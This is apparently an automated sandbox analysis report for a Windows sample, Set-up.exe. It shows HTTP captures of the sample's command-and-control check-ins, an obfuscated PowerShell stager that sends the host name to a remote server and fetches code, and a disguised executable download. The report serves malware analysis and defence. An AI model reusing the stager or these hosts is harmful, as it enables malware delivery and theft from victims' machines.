                                                                                                                                                                                                                                                            2025-01-05 17:53:24 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=61SO7GFGNS
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 1054
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:24 UTC1054OUTData Raw: 2d 2d 36 31 53 4f 37 47 46 47 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35 0d 0a 2d 2d 36 31 53 4f 37 47 46 47 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 31 53 4f 37 47 46 47 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 0d 0a 2d 2d 36 31 53 4f 37 47 46 47 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                                                                                                                                                            Data Ascii: --61SO7GFGNSContent-Disposition: form-data; name="hwid"C127CF45B8E8371785E74BC4E94691B5--61SO7GFGNSContent-Disposition: form-data; name="pid"1--61SO7GFGNSContent-Disposition: form-data; name="lid"hRjzG3--JENYA--61SO7GFGNSContent-
                                                                                                                                                                                                                                                            2025-01-05 17:53:25 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:25 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=nqt0glhb1b8juj08502b0rnjli; expires=Thu, 01 May 2025 11:40:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PH%2BOhGaMnEUNg1Do8ozec4wl%2BXovY3OxVRaIyvkc0H%2FS5xj0RTKwXiXnW0%2B1CgE0PxoJ8UyLFyLsNu%2F9UjT8Z7tJwvWIO%2BUpLn323xsNP1h8GXl8nuDmb1dvpLQzwe6WJf6pS5oS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553e08f5243aa-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2386&min_rtt=2152&rtt_var=974&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1966&delivery_rate=1356877&cwnd=241&unsent_bytes=0&cid=1e1655568461294c&ts=570&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                            2025-01-05 17:53:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            7192.168.2.449756104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:25 UTC268OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 114
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:25 UTC114OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 43 31 32 37 43 46 34 35 42 38 45 38 33 37 31 37 38 35 45 37 34 42 43 34 45 39 34 36 39 31 42 35
                                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--JENYA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=C127CF45B8E8371785E74BC4E94691B5
                                                                                                                                                                                                                                                            2025-01-05 17:53:26 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:26 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=gvav56r73su82s2ne8msacjb0q; expires=Thu, 01 May 2025 11:40:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3losGlthNzl6GTeTlJtYLrfjCCKzx800XhmMnDbR7nursrMXKgZlZ%2F4oyY8MRFEdyPwf0I%2B5Xb2YfaUyiDmUUwNsKqyko8B2qmIq%2Fmh3TW90IQRjT2RwFqr4v%2FZInnYFR%2B51MKjo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553e75d5f8c83-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1962&rtt_var=981&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4240&recv_bytes=1018&delivery_rate=261087&cwnd=189&unsent_bytes=0&cid=82d45fc4977f4902&ts=599&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:26 UTC218INData Raw: 64 34 0d 0a 31 46 63 33 65 53 6f 33 67 4f 46 52 42 4b 4c 52 57 38 44 4a 53 4c 56 30 47 6b 48 4a 54 49 6e 6c 63 44 34 6c 38 6d 6e 63 5a 67 47 50 4c 42 55 4d 43 41 32 69 69 53 56 77 30 71 4a 68 6e 4f 59 55 6d 68 64 2f 4a 72 78 69 2b 6f 30 66 54 6e 6e 64 55 65 6c 52 4e 65 5a 68 42 55 30 65 41 64 7a 4f 49 57 79 4d 70 53 4f 30 36 32 53 58 45 6d 35 6a 38 33 36 6c 78 78 55 63 48 38 4d 55 38 42 30 6a 6f 58 55 4e 57 30 4a 44 39 4a 45 69 50 76 37 2b 42 2b 2b 69 4a 4e 77 45 62 44 53 6b 4a 66 71 51 47 52 42 57 6d 67 61 73 4f 69 36 39 4f 55 4d 6d 53 56 76 77 76 69 4a 73 77 2f 38 76 75 4c 31 71 6d 56 5a 38 4e 65 74 32 75 63 6c 53 57 77 66 49 57 61 45 37 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: d41Fc3eSo3gOFRBKLRW8DJSLV0GkHJTInlcD4l8mncZgGPLBUMCA2iiSVw0qJhnOYUmhd/Jrxi+o0fTnndUelRNeZhBU0eAdzOIWyMpSO062SXEm5j836lxxUcH8MU8B0joXUNW0JD9JEiPv7+B++iJNwEbDSkJfqQGRBWmgasOi69OUMmSVvwviJsw/8vuL1qmVZ8Net2uclSWwfIWaE7
                                                                                                                                                                                                                                                            2025-01-05 17:53:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            8192.168.2.449757185.161.251.214433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:26 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: cegu.shop
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 329
                                                                                                                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                                                                                            Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            9192.168.2.449758172.67.208.584433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Host: klipvumisui.shop
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC909INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:27 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 8767044
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                                            Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64FFvFOdqtR8H6uhAcpONke6uWvw2kA%2BaXZzr8aWNOygUhmy0szfvj9HPUTb%2F9i%2B1dyNxte%2BRDX4G7F2z0OvhDScUk5FByKWhBEDTz6Q7%2BOiT%2FqPo9E1s97mjj16tg%2BZC6Wz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553f45dc4c448-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1700&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2868&recv_bytes=820&delivery_rate=1679125&cwnd=230&unsent_bytes=0&cid=b7c06752ccd7c852&ts=320&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC460INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00
                                                                                                                                                                                                                                                            Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 00 00 00 2c 13 40 00 01 07 48 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00
                                                                                                                                                                                                                                                            Data Ascii: ,@HRESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: fd ff 46 1f 40 00 4a 00 fe ff 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28
                                                                                                                                                                                                                                                            Data Ascii: F@Jr@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 02 00 40 b8 12 40 00 01 00 01 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61
                                                                                                                                                                                                                                                            Data Ascii: @@[@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessa
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 04 53 65 6c 66 02 00 02 9c 10 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54
                                                                                                                                                                                                                                                            Data Ascii: Self@AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@T
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41
                                                                                                                                                                                                                                                            Data Ascii: AfterConstruction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$A
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 58 12 40 00 08 00 00 00 02 08 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08
                                                                                                                                                                                                                                                            Data Ascii: X@VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 00 92 35 40 00 08 00 00 00 24 17 40 00 f8 7e 40 00 00 7f 40 00 f0 80 40 00 e8 80 40 00 08 81 40 00 0c 81 40 00 10 81 40 00 04 81 40 00 8c 7d 40 00 a4 7d 40 00 d8 7d 40 00 00 00 43 00 9b 35 40 00 44 00 f4 ff c1 35 40 00 41 00 f4 ff e6 35 40 00 41 00 f4 ff 0c 36 40 00 41 00 f4 ff 34 36 40 00 41 00 f4 ff 62 36 40 00 41 00 f4 ff 90 36 40 00 43 00 f4 ff c6 36 40 00 43 00 f4 ff 11 37 40 00 43 00 f4 ff 45 37 40 00 43 00 f4 ff a7 37 40 00 43 00 f4 ff 09 38 40 00 43 00 f4 ff 6b 38 40 00 43 00 f4 ff cd 38 40 00 43 00 f4 ff 2f 39 40 00 43 00 f4 ff 91 39 40 00 43 00 f4 ff f3 39 40 00 43 00 f4 ff 55 3a 40 00 43 00 f4 ff b7 3a 40 00 43 00 f4 ff 19 3b 40 00 43 00 f4 ff 7b 3b 40 00 43 00 f4 ff dd 3b 40 00 43 00 f4 ff 3f 3c 40 00 43 00 f4 ff a1 3c 40 00 43 00 f4 ff 03 3d
                                                                                                                                                                                                                                                            Data Ascii: 5@$@~@@@@@@@@}@}@}@C5@D5@A5@A6@A46@Ab6@A6@C6@C7@CE7@C7@C8@Ck8@C8@C/9@C9@C9@CU:@C:@C;@C{;@C;@C?<@C<@C=
                                                                                                                                                                                                                                                            2025-01-05 17:53:27 UTC1369INData Raw: 03 53 72 63 02 00 01 04 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 3c 4c 40 00 01 00 03 53 72 63 02 00 00 9c 10 40 00 02 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 08 32 40 00 0c 00 04 44 65 73 74 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 28 9c 4a 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 08 32 40 00 01 00 03 53 72 63 02 00 01 3c 4c 40 00 02 00 04 44 65 73 74 02 00 00 9c 10 40 00 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00
                                                                                                                                                                                                                                                            Data Ascii: SrcL@Dest@StartIndex@Countb(JCopySelf<L@Src@StartIndex2@Dest@Countb(JCopySelf2@Src<L@Dest@StartIndex@Countb


                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:12:53:04
                                                                                                                                                                                                                                                            Start date:05/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
